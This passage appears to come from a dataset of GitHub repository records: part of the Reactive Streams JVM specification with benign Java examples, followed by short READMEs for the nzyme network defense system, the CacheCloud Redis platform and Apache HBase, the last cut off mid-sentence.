detectable effect to the calling thread, and can as such safely be called any number of times.| | <a name="term_serially">Serial(ly)</a> | In the context of a [Signal](#term_signal), non-overlapping. In the context of the JVM, calls to methods on an object are serial if and only if there is a happens-before relationship between those calls (implying also that the calls do not overlap). When the calls are performed asynchronously, coordination to establish the happens-before relationship is to be implemented using techniques such as, but not limited to, atomics, monitors, or locks. | | <a name="term_thread-safe">Thread-safe</a> | Can be safely invoked synchronously, or asynchronously, without requiring external synchronization to ensure program correctness. | ### SPECIFICATION #### 1. Publisher ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Publisher.java)) ```java public interface Publisher<T> { public void subscribe(Subscriber<?
super T> s); } ```` | ID | Rule | | ------------------------- | ------------------------------------------------------------------------------------------------------ | | <a name="1.1">1</a> | The total number of `onNext`´s signalled by a `Publisher` to a `Subscriber` MUST be less than or equal to the total number of elements requested by that `Subscriber`´s `Subscription` at all times. | | [:bulb:](#1.1 "1.1 explained") | *The intent of this rule is to make it clear that Publishers cannot signal more elements than Subscribers have requested. There’s an implicit, but important, consequence to this rule: Since demand can only be fulfilled after it has been received, there’s a happens-before relationship between requesting elements and receiving elements.* | | <a name="1.2">2</a> | A `Publisher` MAY signal fewer `onNext` than requested and terminate the `Subscription` by calling `onComplete` or `onError`. | | [:bulb:](#1.2 "1.2 explained") | *The intent of this rule is to make it clear that a Publisher cannot guarantee that it will be able to produce the number of elements requested; it simply might not be able to produce them all; it may be in a failed state; it may be empty or otherwise already completed.* | | <a name="1.3">3</a> | `onSubscribe`, `onNext`, `onError` and `onComplete` signaled to a `Subscriber` MUST be signaled [serially](#term_serially). | | [:bulb:](#1.3 "1.3 explained") | *The intent of this rule is to permit the signalling of signals (including from multiple threads) if and only if a happens-before relation between each of the signals is established.* | | <a name="1.4">4</a> | If a `Publisher` fails it MUST signal an `onError`. | | [:bulb:](#1.4 "1.4 explained") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers if it detects that it cannot proceed—Subscribers must be given a chance to clean up resources or otherwise deal with the Publisher´s failures.* | | <a name="1.5">5</a> | If a `Publisher` terminates successfully (finite stream) it MUST signal an `onComplete`. | | [:bulb:](#1.5 "1.5 explained") | *The intent of this rule is to make it clear that a Publisher is responsible for notifying its Subscribers that it has reached a [terminal state](#term_terminal_state)—Subscribers can then act on this information; clean up resources, etc.* | | <a name="1.6">6</a> | If a `Publisher` signals either `onError` or `onComplete` on a `Subscriber`, that `Subscriber`’s `Subscription` MUST be considered cancelled. | | [:bulb:](#1.6 "1.6 explained") | *The intent of this rule is to make sure that a Subscription is treated the same no matter if it was cancelled, the Publisher signalled onError or onComplete.* | | <a name="1.7">7</a> | Once a [terminal state](#term_terminal_state) has been signaled (`onError`, `onComplete`) it is REQUIRED that no further signals occur. | | [:bulb:](#1.7 "1.7 explained") | *The intent of this rule is to make sure that onError and onComplete are the final states of an interaction between a Publisher and Subscriber pair.* | | <a name="1.8">8</a> | If a `Subscription` is cancelled its `Subscriber` MUST eventually stop being signaled. | | [:bulb:](#1.8 "1.8 explained") | *The intent of this rule is to make sure that Publishers respect a Subscriber’s request to cancel a Subscription when Subscription.cancel() has been called. 
The reason for **eventually** is because signals can have propagation delay due to being asynchronous.* | | <a name="1.9">9</a> | `Publisher.subscribe` MUST call `onSubscribe` on the provided `Subscriber` prior to any other signals to that `Subscriber` and MUST [return normally](#term_return_normally), except when the provided `Subscriber` is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way to signal failure (or reject the `Subscriber`) is by calling `onError` (after calling `onSubscribe`). | | [:bulb:](#1.9 "1.9 explained") | *The intent of this rule is to make sure that `onSubscribe` is always signalled before any of the other signals, so that initialization logic can be executed by the Subscriber when the signal is received. Also `onSubscribe` MUST only be called at most once, [see [2.12](#2.12)]. If the supplied `Subscriber` is `null`, there is nowhere else to signal this but to the caller, which means a `java.lang.NullPointerException` must be thrown. Examples of possible situations: A stateful Publisher can be overwhelmed, bounded by a finite number of underlying resources, exhausted, or in a [terminal state](#term_terminal_state).* | | <a name="1.10">10</a> | `Publisher.subscribe` MAY be called as many times as wanted but MUST be with a different `Subscriber` each time [see [2.12](#2.12)]. | | [:bulb:](#1.10 "1.10 explained") | *The intent of this rule is to have callers of `subscribe` be aware that a generic Publisher and a generic Subscriber cannot be assumed to support being attached multiple times. Furthermore, it also mandates that the semantics of `subscribe` must be upheld no matter how many times it is called.* | | <a name="1.11">11</a> | A `Publisher` MAY support multiple `Subscriber`s and decides whether each `Subscription` is unicast or multicast. | | [:bulb:](#1.11 "1.11 explained") | *The intent of this rule is to give Publisher implementations the flexibility to decide how many, if any, Subscribers they will support, and how elements are going to be distributed.* | #### 2. Subscriber ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscriber.java)) ```java public interface Subscriber<T> { public void onSubscribe(Subscription s); public void onNext(T t); public void onError(Throwable t); public void onComplete(); } ```` | ID | Rule | | ------------------------- | ------------------------------------------------------------------------------------------------------ | | <a name="2.1">1</a> | A `Subscriber` MUST signal demand via `Subscription.request(long n)` to receive `onNext` signals. | | [:bulb:](#2.1 "2.1 explained") | *The intent of this rule is to establish that it is the responsibility of the Subscriber to decide when and how many elements it is able and willing to receive. To avoid signal reordering caused by reentrant Subscription methods, it is strongly RECOMMENDED for synchronous Subscriber implementations to invoke Subscription methods at the very end of any signal processing. It is RECOMMENDED that Subscribers request the upper limit of what they are able to process, as requesting only one element at a time results in an inherently inefficient "stop-and-wait" protocol.* | | <a name="2.2">2</a> | If a `Subscriber` suspects that its processing of signals will negatively impact its `Publisher`´s responsivity, it is RECOMMENDED that it asynchronously dispatches its signals. 
| | [:bulb:](#2.2 "2.2 explained") | *The intent of this rule is that a Subscriber should [not obstruct](#term_non-obstructing) the progress of the Publisher from an execution point-of-view. In other words, the Subscriber should not starve the Publisher from receiving CPU cycles.* | | <a name="2.3">3</a> | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST NOT call any methods on the `Subscription` or the `Publisher`. | | [:bulb:](#2.3 "2.3 explained") | *The intent of this rule is to prevent cycles and race-conditions—between Publisher, Subscription and Subscriber—during the processing of completion signals.* | | <a name="2.4">4</a> | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST consider the Subscription cancelled after having received the signal. | | [:bulb:](#2.4 "2.4 explained") | *The intent of this rule is to make sure that Subscribers respect a Publisher’s [terminal state](#term_terminal_state) signals. A Subscription is simply not valid anymore after an onComplete or onError signal has been received.* | | <a name="2.5">5</a> | A `Subscriber` MUST call `Subscription.cancel()` on the given `Subscription` after an `onSubscribe` signal if it already has an active `Subscription`. | | [:bulb:](#2.5 "2.5 explained") | *The intent of this rule is to prevent that two, or more, separate Publishers from trying to interact with the same Subscriber. Enforcing this rule means that resource leaks are prevented since extra Subscriptions will be cancelled. Failure to conform to this rule may lead to violations of Publisher rule 1, amongst others. Such violations can lead to hard-to-diagnose bugs.* | | <a name="2.6">6</a> | A `Subscriber` MUST call `Subscription.cancel()` if the `Subscription` is no longer needed. | | [:bulb:](#2.6 "2.6 explained") | *The intent of this rule is to establish that Subscribers cannot just throw Subscriptions away when they are no longer needed, they have to call `cancel` so that resources held by that Subscription can be safely, and timely, reclaimed. An example of this would be a Subscriber which is only interested in a specific element, which would then cancel its Subscription to signal its completion to the Publisher.* | | <a name="2.7">7</a> | A Subscriber MUST ensure that all calls on its Subscription's request and cancel methods are performed [serially](#term_serially). | | [:bulb:](#2.7 "2.7 explained") | *The intent of this rule is to permit the calling of the request and cancel methods (including from multiple threads) if and only if a [serial](#term_serially) relation between each of the calls is established.* | | <a name="2.8">8</a> | A `Subscriber` MUST be prepared to receive one or more `onNext` signals after having called `Subscription.cancel()` if there are still requested elements pending [see [3.12](#3.12)]. `Subscription.cancel()` does not guarantee to perform the underlying cleaning operations immediately. | | [:bulb:](#2.8 "2.8 explained") | *The intent of this rule is to highlight that there may be a delay between calling `cancel` and the Publisher observing that cancellation.* | | <a name="2.9">9</a> | A `Subscriber` MUST be prepared to receive an `onComplete` signal with or without a preceding `Subscription.request(long n)` call. 
| | [:bulb:](#2.9 "2.9 explained") | *The intent of this rule is to establish that completion is unrelated to the demand flow—this allows for streams which complete early, and obviates the need to *poll* for completion.* | | <a name="2.10">10</a> | A `Subscriber` MUST be prepared to receive an `onError` signal with or without a preceding `Subscription.request(long n)` call. | | [:bulb:](#2.10 "2.10 explained") | *The intent of this rule is to establish that Publisher failures may be completely unrelated to signalled demand. This means that Subscribers do not need to poll to find out if the Publisher will not be able to fulfill its requests.* | | <a name="2.11">11</a> | A `Subscriber` MUST make sure that all calls on its [signal](#term_signal) methods happen-before the processing of the respective signals. I.e. the Subscriber must take care of properly publishing the signal to its processing logic. | | [:bulb:](#2.11 "2.11 explained") | *The intent of this rule is to establish that it is the responsibility of the Subscriber implementation to make sure that asynchronous processing of its signals are thread safe. See [JMM definition of Happens-Before in section 17.4.5](https://docs.oracle.com/javase/specs/jls/se8/html/jls-17.html#jls-17.4.5).* | | <a name="2.12">12</a> | `Subscriber.onSubscribe` MUST be called at most once for a given `Subscriber` (based on object equality). | | [:bulb:](#2.12 "2.12 explained") | *The intent of this rule is to establish that it MUST be assumed that the same Subscriber can only be subscribed at most once. Note that `object equality` is `a.equals(b)`.* | | <a name="2.13">13</a> | Calling `onSubscribe`, `onNext`, `onError` or `onComplete` MUST [return normally](#term_return_normally) except when any provided parameter is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way for a `Subscriber` to signal failure is by cancelling its `Subscription`. In the case that this rule is violated, any associated `Subscription` to the `Subscriber` MUST be considered as cancelled, and the caller MUST raise this error condition in a fashion that is adequate for the runtime environment. | | [:bulb:](#2.13 "2.13 explained") | *The intent of this rule is to establish the semantics for the methods of Subscriber and what the Publisher is allowed to do in which case this rule is violated. «Raise this error condition in a fashion that is adequate for the runtime environment» could mean logging the error—or otherwise make someone or something aware of the situation—as the error cannot be signalled to the faulty Subscriber.* | #### 3. Subscription ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscription.java)) ```java public interface Subscription { public void request(long n); public void cancel(); } ```` | ID | Rule | | ------------------------- | ------------------------------------------------------------------------------------------------------ | | <a name="3.1">1</a> | `Subscription.request` and `Subscription.cancel` MUST only be called inside of its `Subscriber` context. | | [:bulb:](#3.1 "3.1 explained") | *The intent of this rule is to establish that a Subscription represents the unique relationship between a Subscriber and a Publisher [see [2.12](#2.12)]. 
The Subscriber is in control over when elements are requested and when more elements are no longer needed.* | | <a name="3.2">2</a> | The `Subscription` MUST allow the `Subscriber` to call `Subscription.request` synchronously from within `onNext` or `onSubscribe`. | | [:bulb:](#3.2 "3.2 explained") | *The intent of this rule is to make it clear that implementations of `request` must be reentrant, to avoid stack overflows in the case of mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). This implies that Publishers can be `synchronous`, i.e. signalling `onNext`´s on the thread which calls `request`.* | | <a name="3.3">3</a> | `Subscription.request` MUST place an upper bound on possible synchronous recursion between `Publisher` and `Subscriber`. | | [:bulb:](#3.3 "3.3 explained") | *The intent of this rule is to complement [see [3.2](#3.2)] by placing an upper limit on the mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). Implementations are RECOMMENDED to limit this mutual recursion to a depth of `1` (ONE)—for the sake of conserving stack space. An example for undesirable synchronous, open recursion would be Subscriber.onNext -> Subscription.request -> Subscriber.onNext -> …, as it otherwise will result in blowing the calling thread´s stack.* | | <a name="3.4">4</a> | `Subscription.request` SHOULD respect the responsivity of its caller by returning in a timely manner. | | [:bulb:](#3.4 "3.4 explained") | *The intent of this rule is to establish that `request` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution.* | | <a name="3.5">5</a> | `Subscription.cancel` MUST respect the responsivity of its caller by returning in a timely manner, MUST be idempotent and MUST be [thread-safe](#term_thread-safe). | | [:bulb:](#3.5 "3.5 explained") | *The intent of this rule is to establish that `cancel` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution. Furthermore, it is also important that it is possible to call it multiple times without any adverse effects.* | | <a name="3.6">6</a> | After the `Subscription` is cancelled, additional `Subscription.request(long n)` MUST be [NOPs](#term_nop). | | [:bulb:](#3.6 "3.6 explained") | *The intent of this rule is to establish a causal relationship between cancellation of a subscription and the subsequent non-operation of requesting more elements.* | | <a name="3.7">7</a> | After the `Subscription` is cancelled, additional `Subscription.cancel()` MUST be [NOPs](#term_nop). | | [:bulb:](#3.7 "3.7 explained") | *The intent of this rule is superseded by [3.5](#3.5).* | | <a name="3.8">8</a> | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST register the given number of additional elements to be produced to the respective subscriber. 
| | [:bulb:](#3.8 "3.8 explained") | *The intent of this rule is to make sure that `request`-ing is an additive operation, as well as ensuring that a request for elements is delivered to the Publisher.* | | <a name="3.9">9</a> | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST signal `onError` with a `java.lang.IllegalArgumentException` if the argument is <= 0. The cause message SHOULD explain that non-positive request signals are illegal. | | [:bulb:](#3.9 "3.9 explained") | *The intent of this rule is to prevent faulty implementations to proceed operation without any exceptions being raised. Requesting a negative or 0 number of elements, since requests are additive, most likely to be the result of an erroneous calculation on the behalf of the Subscriber.* | | <a name="3.10">10</a> | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onNext` on this (or other) subscriber(s). | | [:bulb:](#3.10 "3.10 explained") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* | | <a name="3.11">11</a> | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onComplete` or `onError` on this (or other) subscriber(s). | | [:bulb:](#3.11 "3.11 explained") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* | | <a name="3.12">12</a> | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually stop signaling its `Subscriber`. The operation is NOT REQUIRED to affect the `Subscription` immediately. | | [:bulb:](#3.12 "3.12 explained") | *The intent of this rule is to establish that the desire to cancel a Subscription is eventually respected by the Publisher, acknowledging that it may take some time before the signal is received.* | | <a name="3.13">13</a> | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually drop any references to the corresponding subscriber. | | [:bulb:](#3.13 "3.13 explained") | *The intent of this rule is to make sure that Subscribers can be properly garbage-collected after their subscription no longer being valid. Re-subscribing with the same Subscriber object is discouraged [see [2.12](#2.12)], but this specification does not mandate that it is disallowed since that would mean having to store previously cancelled subscriptions indefinitely.* | | <a name="3.14">14</a> | While the `Subscription` is not cancelled, calling `Subscription.cancel` MAY cause the `Publisher`, if stateful, to transition into the `shut-down` state if no other `Subscription` exists at this point [see [1.9](#1.9)]. | | [:bulb:](#3.14 "3.14 explained") | *The intent of this rule is to allow for Publishers to signal `onComplete` or `onError` following `onSubscribe` for new Subscribers in response to a cancellation signal from an existing Subscriber.* | | <a name="3.15">15</a> | Calling `Subscription.cancel` MUST [return normally](#term_return_normally). | | [:bulb:](#3.15 "3.15 explained") | *The intent of this rule is to disallow implementations to throw exceptions in response to `cancel` being called.* | | <a name="3.16">16</a> | Calling `Subscription.request` MUST [return normally](#term_return_normally). 
| | [:bulb:](#3.16 "3.16 explained") | *The intent of this rule is to disallow implementations to throw exceptions in response to `request` being called.* | | <a name="3.17">17</a> | A `Subscription` MUST support an unbounded number of calls to `request` and MUST support a demand up to 2^63-1 (`java.lang.Long.MAX_VALUE`). A demand equal or greater than 2^63-1 (`java.lang.Long.MAX_VALUE`) MAY be considered by the `Publisher` as “effectively unbounded”. | | [:bulb:](#3.17 "3.17 explained") | *The intent of this rule is to establish that the Subscriber can request an unbounded number of elements, in any increment above 0 [see [3.9](#3.9)], in any number of invocations of `request`. As it is not feasibly reachable with current or foreseen hardware within a reasonable amount of time (1 element per nanosecond would take 292 years) to fulfill a demand of 2^63-1, it is allowed for a Publisher to stop tracking demand beyond this point.* | A `Subscription` is shared by exactly one `Publisher` and one `Subscriber` for the purpose of mediating the data exchange between this pair. This is the reason why the `subscribe()` method does not return the created `Subscription`, but instead returns `void`; the `Subscription` is only passed to the `Subscriber` via the `onSubscribe` callback. #### 4.Processor ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Processor.java)) ```java public interface Processor<T, R> extends Subscriber<T>, Publisher<R> { } ```` | ID | Rule | | ------------------------ | ------------------------------------------------------------------------------------------------------ | | <a name="4.1">1</a> | A `Processor` represents a processing stage—which is both a `Subscriber` and a `Publisher` and MUST obey the contracts of both. | | [:bulb:](#4.1 "4.1 explained") | *The intent of this rule is to establish that Processors behave, and are bound by, both the Publisher and Subscriber specifications.* | | <a name="4.2">2</a> | A `Processor` MAY choose to recover an `onError` signal. If it chooses to do so, it MUST consider the `Subscription` cancelled, otherwise it MUST propagate the `onError` signal to its Subscribers immediately. | | [:bulb:](#4.2 "4.2 explained") | *The intent of this rule is to inform that it’s possible for implementations to be more than simple transformations.* | While not mandated, it can be a good idea to cancel a `Processor`´s upstream `Subscription` when/if its last `Subscriber` cancels their `Subscription`, to let the cancellation signal propagate upstream. ### Asynchronous vs Synchronous Processing ### The Reactive Streams API prescribes that all processing of elements (`onNext`) or termination signals (`onError`, `onComplete`) MUST NOT *block* the `Publisher`. However, each of the `on*` handlers can process the events synchronously or asynchronously. Take this example: ``` nioSelectorThreadOrigin map(f) filter(p) consumeTo(toNioSelectorOutput) ``` It has an async origin and an async destination. Let’s assume that both origin and destination are selector event loops. The `Subscription.request(n)` must be chained from the destination to the origin. This is now where each implementation can choose how to do this. The following uses the pipe `|` character to signal async boundaries (queue and schedule) and `R#` to represent resources (possibly threads). 
``` nioSelectorThreadOrigin | map(f) | filter(p) | consumeTo(toNioSelectorOutput) -------------- R1 ---- | - R2 - | -- R3 --- | ---------- R4 ---------------- ``` In this example each of the 3 consumers, `map`, `filter` and `consumeTo` asynchronously schedule the work. It could be on the same event loop (trampoline), separate threads, whatever. ``` nioSelectorThreadOrigin map(f) filter(p) | consumeTo(toNioSelectorOutput) ------------------- R1 ----------------- | ---------- R2 ---------------- ``` Here it is only the final step that asynchronously schedules, by adding work to the NioSelectorOutput event loop. The `map` and `filter` steps are synchronously performed on the origin thread. Or another implementation could fuse the operations to the final consumer: ``` nioSelectorThreadOrigin | map(f) filter(p) consumeTo(toNioSelectorOutput) --------- R1 ---------- | ------------------ R2 ------------------------- ``` All of these variants are "asynchronous streams". They all have their place and each has different tradeoffs including performance and implementation complexity. The Reactive Streams contract allows implementations the flexibility to manage resources and scheduling and mix asynchronous and synchronous processing within the bounds of a non-blocking, asynchronous, dynamic push-pull stream. In order to allow fully asynchronous implementations of all participating API elements—`Publisher`/`Subscription`/`Subscriber`/`Processor`—all methods defined by these interfaces return `void`. ### Subscriber controlled queue bounds ### One of the underlying design principles is that all buffer sizes are to be bounded and these bounds must be *known* and *controlled* by the subscribers. These bounds are expressed in terms of *element count* (which in turn translates to the invocation count of onNext). Any implementation that aims to support infinite streams (especially high output rate streams) needs to enforce bounds all along the way to avoid out-of-memory errors and constrain resource usage in general. Since back-pressure is mandatory the use of unbounded buffers can be avoided. In general, the only time when a queue might grow without bounds is when the publisher side maintains a higher rate than the subscriber for an extended period of time, but this scenario is handled by backpressure instead. Queue bounds can be controlled by a subscriber signaling demand for the appropriate number of elements. At any point in time the subscriber knows: - the total number of elements requested: `P` - the number of elements that have been processed: `N` Then the maximum number of elements that may arrive—until more demand is signaled to the Publisher—is `P - N`. In the case that the subscriber also knows the number of elements B in its input buffer then this bound can be refined to `P - B - N`. These bounds must be respected by a publisher independent of whether the source it represents can be backpressured or not. In the case of sources whose production rate cannot be influenced—for example clock ticks or mouse movement—the publisher must choose to either buffer or drop elements to obey the imposed bounds. Subscribers signaling a demand for one element after the reception of an element effectively implement a Stop-and-Wait protocol where the demand signal is equivalent to acknowledgement. By providing demand for multiple elements the cost of acknowledgement is amortized. 
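As a tiny worked example of the bound just described (the numbers are illustrative only):

```java
public class QueueBoundExample {
    public static void main(String[] args) {
        long requested = 100; // P: total elements requested so far
        long processed = 60;  // N: elements already processed
        long buffered  = 15;  // B: elements currently in the input buffer

        // At most P - B - N more elements may arrive before new demand is signalled.
        long maxArrivals = requested - buffered - processed;
        System.out.println(maxArrivals); // 25
    }
}
```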
It is worth noting that the subscriber is allowed to signal demand at any point in time, allowing it to avoid unnecessary delays between the publisher and the subscriber (i.e. keeping its input buffer filled without having to wait for full round-trips). ## Legal This project is a collaboration between engineers from Kaazing, Lightbend, Netflix, Pivotal, Red Hat, Twitter and many others. This project is licensed under MIT No Attribution (SPDX: MIT-0).
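To tie several of the rules quoted above together, here is a deliberately tiny, single-element `Publisher` sketch. It aims to honour the cited rules (onSubscribe first, emit only within demand, NOP after cancel), but it is an illustration, not a production-grade or TCK-verified implementation:

```java
import java.util.concurrent.atomic.AtomicBoolean;

import org.reactivestreams.Publisher;
import org.reactivestreams.Subscriber;
import org.reactivestreams.Subscription;

public final class SingleValuePublisher implements Publisher<String> {
    private final String value;

    public SingleValuePublisher(String value) { this.value = value; }

    @Override
    public void subscribe(Subscriber<? super String> s) {
        if (s == null) throw new NullPointerException(); // rule 1.9
        s.onSubscribe(new Subscription() {
            private final AtomicBoolean done = new AtomicBoolean();

            @Override
            public void request(long n) {
                if (n <= 0) { // rule 3.9: non-positive demand is an error
                    if (done.compareAndSet(false, true)) {
                        s.onError(new IllegalArgumentException("non-positive request"));
                    }
                    return;
                }
                if (done.compareAndSet(false, true)) { // emit at most once
                    s.onNext(value);   // rule 1.1: stays within requested demand
                    s.onComplete();    // rule 1.5: finite stream terminates
                }
            }

            @Override
            public void cancel() {
                done.set(true); // rules 3.6/3.7: later request/cancel are NOPs
            }
        });
    }
}
```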
0
nzymedefense/nzyme
Network Defense System.
detection ethernet ids ndr network response security visibility wifi wireless
# nzyme - Network Defense System [![Codecov](https://img.shields.io/codecov/c/github/lennartkoopmann/nzyme.svg)](https://codecov.io/gh/lennartkoopmann/nzyme/) [![License](https://img.shields.io/badge/license-SSPL-brightgreen)](http://www.mongodb.com/licensing/server-side-public-license) Learn more at https://www.nzyme.org/. **Version 2.0.0 of nzyme is currently in development. The previous website for v1.x is archived [here](https://v1.nzyme.org/).** ## Contributing There are many ways to contribute and all community interaction is absolutely welcome: * Open an issue for any kind of bug you think you have found. * Open an issue for anything that was confusing to you. Bad, missing or confusing documentation is considered a bug. * Open a Pull Request for a new feature or a bugfix. It is a good idea to get in contact first to make sure that it fits the roadmap and has a chance to be merged. * Write documentation. * Write a blog post. * Help a user in the issue tracker or the IRC channel (#nzyme on FreeNode). * Get in contact and say how you use it or what would be a cool addition. * Tell the world. Please be aware of the [Code of Conduct](CODE_OF_CONDUCT.md) that will be enforced across all channels and platforms. ## Legal notice Make sure to comply with local laws, especially with regard to wiretapping, when running nzyme. Note that nzyme never decrypts any data; it only reads unencrypted data.
0
sohutv/cachecloud
CacheCloud is a private Redis cloud platform from Sohu TV. It supports multiple Redis architectures (Standalone, Sentinel, Cluster) with efficient management, effectively reducing large-scale Redis operation and maintenance costs and improving resource control and utilization. The platform provides rapid construction/migration, operations management, elastic scaling, statistical monitoring, and client integration.
cachecloud java jedis lettuce redis redis-cache redis-client redis-cluster redis-monitor redis-sentinel
[中文](README_CN.md) | [EN](README_EN.md) ![CacheCloud platform](cachecloud-web/src/main/resources/static/img/readme/cachecloud-head.png) [![CI checks on main badge]][CI checks on main link] [![latest release badge]][latest release link] [![github stars badge]][github stars link] [![github forks badge]][github forks link] [![github open issues badge]][github open issues link] [![github open prs badge]][github open prs link] [![latest commit to main badge]][latest commit to main link] [CI checks on main badge]: https://flat.badgen.net/github/checks/sohutv/cachecloud/main?label=CI%20status%20on%20main&cache=900&icon=github [CI checks on main link]:https://github.com/sohutv/cachecloud/actions?query=branch%3Amain [github forks badge]: https://flat.badgen.net/github/forks/sohutv/cachecloud?icon=github [github forks link]: https://useful-forks.github.io/?repo=sohutv%2Fcachecloud [github open issues badge]: https://flat.badgen.net/github/open-issues/sohutv/cachecloud?icon=github [github open issues link]: https://github.com/sohutv/cachecloud/issues?q=is%3Aissue+is%3Aopen [github open prs badge]: https://flat.badgen.net/github/open-prs/sohutv/cachecloud?icon=github [github open prs link]: https://github.com/sohutv/cachecloud/pulls?q=is%3Apr+is%3Aopen [github stars badge]: https://flat.badgen.net/github/stars/sohutv/cachecloud?icon=github [github stars link]: https://github.com/sohutv/cachecloud/stargazers [latest commit to main badge]: https://flat.badgen.net/github/last-commit/sohutv/cachecloud/main?icon=github&color=yellow&label=last%20dev%20commit&cache=900 [latest commit to main link]: https://github.com/sohutv/cachecloud/commits/main [latest release badge]: https://flat.badgen.net/github/release/sohutv/cachecloud/development?icon=github [latest release link]: https://github.com/sohutv/cachecloud/releases <div align="center"> <h2>CacheCloud Cloud Platform</h2> <a href="https://github.com/sohutv/cachecloud/blob/main/cachecloud-web/src/main/resources/static/wiki/quickstart/index.md">Quickstart</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud/blob/main/cachecloud-web/src/main/resources/static/wiki/access/client.md">Client</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud/wiki">Docs</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud/wiki#%E5%85%ADfaq%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98">FAQ</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="http://43.137.44.6:8080/admin/app/list">Demo</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud/issues/289">Feedback</a> <span>&nbsp;&nbsp;•&nbsp;&nbsp;</span> <a href="https://github.com/sohutv/cachecloud#contact">Contact</a> <hr /> </div> ## What is CacheCloud?
CacheCloud is a Redis cloud management platform. It supports Redis in Standalone, Sentinel, and Cluster architectures with efficient management, effectively reducing the cost of operating Redis at scale while improving resource control and utilization. The platform provides rapid setup/migration, operations management, elastic scaling, statistics and monitoring, and client integration.

<img src="cachecloud-web/src/main/resources/static/img/readme/cachecloud-info.png" width="100%"/>

## CacheCloud Feature Architecture
+ Redis setup: host environment initialization, instance deployment and installation, support for all architecture types;
+ Operations management: host environment, resource management, application audit, application operations, quality monitoring, diagnostic analysis;
+ Statistics and monitoring: log collection, instance collection, machine collection, application statistics, monitoring alerts, problem diagnosis;
+ Client access: SDK access, language access, client monitoring;
+ Elastic scaling: resource shrinking, application scaling, external access;

<img src="cachecloud-web/src/main/resources/static/img/readme/CacheCloud功能架构.png" width="100%"/> <a name="cc4"/>

## CacheCloud Usage Scale
+ 80+ billion commands/day
+ 18T+ total memory
+ 420+ apps / 4800+ instances in total
+ 80+ physical machines / 360+ K8s pods in total

<a name="cc5"/>

## CacheCloud vs. Cloud Vendors
<img src="cachecloud-web/src/main/resources/static/img/readme/sentinel-cost.png" width="50%"/><img src="cachecloud-web/src/main/resources/static/img/readme/cluster-cost.png" width="50%"/> <div align="center">Redis master-slave / cluster deployment cost</div>

## Contributors
<a href="https://github.com/sohutv/cachecloud/graphs/contributors"> <img src="https://contrib.rocks/image?repo=sohutv/cachecloud" /> </a>

## Thanks to Our Supporters
![Stargazers repo roster for @sohutv/cachecloud](https://bytecrank.com/nastyox/reporoster/php/stargazersSVG.php?user=sohutv&repo=cachecloud) ![Forkers repo roster for @sohutv/cachecloud](https://bytecrank.com/nastyox/reporoster/php/forkersSVG.php?user=sohutv&repo=cachecloud)

<a name="contact"/>

## Contact Us
+ QQ groups: 534429768 (full) / group 2: 894022242 / group 3: 908821300
+ WeChat group: <img src="http://photocdn.tv.sohu.com/img/cachecloud/weixin.jpg" width="30%"/> <img src="cachecloud-web/src/main/resources/static/img/readme/subcribe.png" width="30%"/>
+ WeChat: if you have public network resources, please contact me; they can be added to the open-source deployment trial to improve the user experience for everyone. <img src="cachecloud-web/src/main/resources/static/img/readme/wechat.png" width="30%"/>

If you find CacheCloud helpful, a Star ⭐ is appreciated.
0
apache/hbase
Apache HBase
database hbase java
<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> ![hbase-logo](https://raw.githubusercontent.com/apache/hbase/master/src/site/resources/images/hbase_logo_with_orca_large.png) [Apache HBase](https://hbase.apache.org) is an open-source, distributed, versioned, column-oriented store modeled after Google's [Bigtable](https://research.google.com/archive/bigtable.html): A Distributed Storage System for Structured Data by Chang et al. Just as Bigtable leverages the distributed data storage provided by the Google File System, HBase provides Bigtable-like capabilities on top of [Apache Hadoop](https://hadoop.apache.org/). # Getting Started To get started using HBase, the full documentation for this release can be found under the docs/ directory that accompanies this README. Using a browser, open docs/index.html to view the project home page (or browse https://hbase.apache.org). The HBase '[book](https://hbase.apache.org/book.html)' has a 'quick start' section and is where you should begin your exploration of the HBase project. The latest HBase can be downloaded from the [download 